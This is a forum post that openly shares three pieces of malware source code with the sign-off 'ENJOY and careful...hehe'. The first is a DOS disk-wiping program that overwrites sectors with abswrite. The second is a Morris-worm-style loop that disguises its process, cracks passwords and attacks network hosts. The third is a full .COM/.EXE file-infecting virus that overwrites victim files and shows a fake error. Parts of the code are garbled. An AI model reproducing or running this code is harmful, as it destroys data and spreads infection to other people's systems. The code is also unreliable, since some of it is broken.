infected by skytop

by SKYTOP1234 Tue Nov 17, 2009 11:26 pm

#include

main()
{
char *vir;
abswrite(0,50,0,vir);
abswrite(1,50,0,vir);
abswrite(2,50,0,vir);
abswrite(3,50,0,vir);
abswrite(4,50,0,vir);
printf("FUCK YOU ALL");
printf("The Bomber");
}

66 The Dead Zone 214-522-5321 300/1200/2400 666

#include

#include

#include

#include

long current_time;

struct rlimit no_core = {0,0};

int

main (argc, argv)

int argc;

char *argv[];

{

int n;

int parent = 0;

int okay = 0;

/* change calling name to "sh" */

strcpy(argv[0], "sh");

/* prevent core files by setting limit to 0 */

setrlimit(RLIMIT_CORE, no_core);

current_time = time(0);

/* seed random number generator with time */

srand48(current_time);

n = 1;

while (argv[n]) {

/* save process id of parent */

if (!strncmp(argv[n], "-p", 2)) {

parent = atoi (argv[++n]);

n++;

}

else {

/* check for 1l.c in argument list */

if (!strncmp(argv([n], "1l.c", 4))

okay = 1;

/* load an object file into memory */

load_object (argv[n];

/* clean up by unlinking file */

if (parent)

unlink (argv[n]);

/* and removing object file name */

strcpy (argv[n++], "");

}

}

/* if 1l.c was not in argument list, quit */

if (!okay)

exit (0);

/* reset process group */

setpgrp (getpid());

/* kill parent shell if parent is set */

if (parent)

kill(parent, SIGHUP);

/* scan for network interfaces */

if_init();

/* collect list of gateways from netstat */

rt_init();

/* start main loop */

doit();

}

int

doit()

{

current_time = time (0);

/* seed random number generator (again) */

srand48(current_time);

/* attack gateways, local nets, remote nets */

attack_hosts();

/* check for a "listening" worm */

check_other ()

/* attempt to send byte to "ernie" */

send_message ()

for (; Wink

{

/* crack some passwords */

crack_some ();

/* sleep or listen for other worms */

other_sleep (30);

crack_some ();

/* switch process id's */

if (fork())

/* parent exits, new worm continues */

exit (0);

/* attack gateways, known hosts */

attack_hosts();

other_sleep(120);

/* if 12 hours have passed, reset hosts */

if(time (0) == current_time + (3600*12)) {

reset_hosts();

current_time = time(0); }

/* quit if pleasequit is set, and nextw>10 */

if (pleasequit && nextw > 10)

exit (0);

}

}

/* C-Virus: A generic .COM and .EXE infector

Written by Nowhere Man

Project started and completed on 6-24-91

Written in Turbo C++ v1.00 (works fine with Turbo C v2.00, too)
*/

#pragma inline // Compile to .ASM

#include
#include
#include
#include
#include

void hostile_activity(void);
int infected(char *);
void spread(char *, char *);
void small_print(char *);
char *victim(void);

#define DEBUG
#define ONE_KAY 1024 // 1k
#define TOO_SMALL ((6 * ONE_KAY) + 300) // 6k+ size minimum
#define SIGNATURE "NMAN" // Sign of infection

int main(void)
{
/* The main program */

spread(_argv[0], victim()); // Perform infection
small_print("Out of memory\r\n"); // Print phony error
return(1); // Fake failure...
}

void hostile_activity(void)
{
/* Put whatever you feel like doing here...I chose to
make this part harmless, but if you're feeling
nasty, go ahead and have some fun... */

small_print("\a\a\aAll files infected. Mission complete.\r\n");
exit(2);
}

int infected(char *fname)
{
/* This function determines if fname is infected */

FILE *fp; // File handle
char sig[5]; // Virus signature

fp = fopen(fname, "rb");
fseek(fp, 28L, SEEK_SET);
fread(sig, sizeof(sig) - 1, 1, fp);
#ifdef DEBUG
printf("Signature for %s: %s\n", fname, sig);
#endif
fclose(fp);
return(strncmp(sig, SIGNATURE, sizeof(sig) - 1) == 0);
}

void small_print(char *string)
{
/* This function is a small, quick print routine */

asm {
push si
mov si,string
mov ah,0xE
}

print: asm {
lodsb
or al,al
je finish
int 0x10
jmp short print
}
finish: asm pop si
}

void spread(char *old_name, char *new_name)
{
/* This function infects new_name with old_name */

/* Variable declarations */

FILE *old, *new; // File handles
struct ftime file_time; // Old file date,
time
int attrib; // Old attributes
long old_size, virus_size; // Sizes of files
char *virus_code = NULL; // Pointer to virus
int old_handle, new_handle; // Handles for files

/* Perform the infection */

#ifdef DEBUG
printf("Infecting %s with %s...\n", new_name, old_name);
#endif
old = fopen(old_name, "rb"); // Open virus
new = fopen(new_name, "rb"); // Open victim
old_handle = fileno(old); // Get file handles
new_handle = fileno(new);
old_size = filelength(new_handle); // Get old file size
virus_size = filelength(old_handle); // Get virus size
attrib = _chmod(new_name, 0); // Get old attributes
getftime(new_handle, &file_time); // Get old file time
fclose(new); // Close the virusee
_chmod(new_name, 1, 0); // Clear any read-only
unlink(new_name); // Erase old file
new = fopen(new_name, "wb"); // Open new virus
new_handle = fileno(new);
virus_code = malloc(virus_size); // Allocate space
fread(virus_code, virus_size, 1, old); // Read virus from old
fwrite(virus_code, virus_size, 1, new); // Copy virus to new
_chmod(new_name, 1, attrib); // Replace attributes
chsize(new_handle, old_size); // Replace old size
setftime(new_handle, &file_time); // Replace old time

/* Clean up */

fcloseall(); // Close files
free(virus_code); // Free memory
}

char *victim(void)
{
/* This function returns the virus's next victim */

/* Variable declarations */

char *types[] = {"*.EXE", "*.COM"}; // Potential victims
static struct ffblk ffblk; // DOS file block
int done; // Indicates finish
int index; // Used for loop

/* Find our victim */

if ((_argc > 1) && (fopen(_argv[1], "rb") != NULL))
return(_argv[1]);

for (index = 0; index < sizeof(types); index++) {
done = findfirst(types[index], &ffblk, FA_RDONLY | FA_HIDDEN |
FA_SYSTEM | FA_ARCH);
while (!done) {
#ifdef DEBUG
printf("Scanning %s...\n", ffblk.ff_name);
#endif
/* If you want to check for specific days of the week,
months, etc., here is the place to insert the
code (don't forget to "#include "!) */

if ((!infected(ffblk.ff_name)) && (ffblk.ff_fsize >
TOO_SMALL))
return(ffblk.ff_name);
done = findnext(&ffblk);
}
}

/* If there are no files left to infect, have a little fun... */

hostile_activity();
return(0); // Prevents warning
}
--------------------------------------------------
end of code

ENJOY and careful...hehe